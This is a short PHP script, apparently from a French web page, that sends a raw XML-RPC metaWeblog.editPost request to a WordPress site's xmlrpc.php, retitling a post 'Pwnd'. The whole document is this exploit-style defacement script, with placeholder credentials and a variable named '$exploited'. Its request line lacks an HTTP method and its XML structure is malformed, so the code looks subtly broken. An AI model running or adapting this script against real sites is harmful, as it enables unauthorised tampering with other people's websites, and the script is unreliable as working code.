1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| <?php
$host = 'www.mon-site-web.net'; // blog url
$page = '/xmlrpc.php';
$data = '<?xml version="1.0" ?>
<methodcall>
<methodname>metaWeblog.editPost</methodname>
<params>
<value>
<i4>post_ID</i4>
</value>
<value>
<string>username</string>
</value>
<value>
<string>password</string>
</value>
<struct>
<member>
<name>post_type</name>
<value>page</value>
</member>
<member>
<name>title</name>
<value>
<string>Pwnd</string>
</value>
</member>
<member>
<name>description</name>
<value>Test</value>
</member>
</struct>
</params>
</methodcall>';
$exploited = fsockopen($host, 80, $errorNumber, $errorString);
$requestHeader = " ".$page." HTTP/1.1\r\n";
$requestHeader.= "Host: ".$host."\r\n";
$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
$requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
$requestHeader.= "Content-Length: ".strlen($data)."\r\n";
$requestHeader.= "Connection: close\r\n\r\n";
$requestHeader.= $data;
fwrite($exploited, $requestHeader );
echo 'done';
?> |
Partager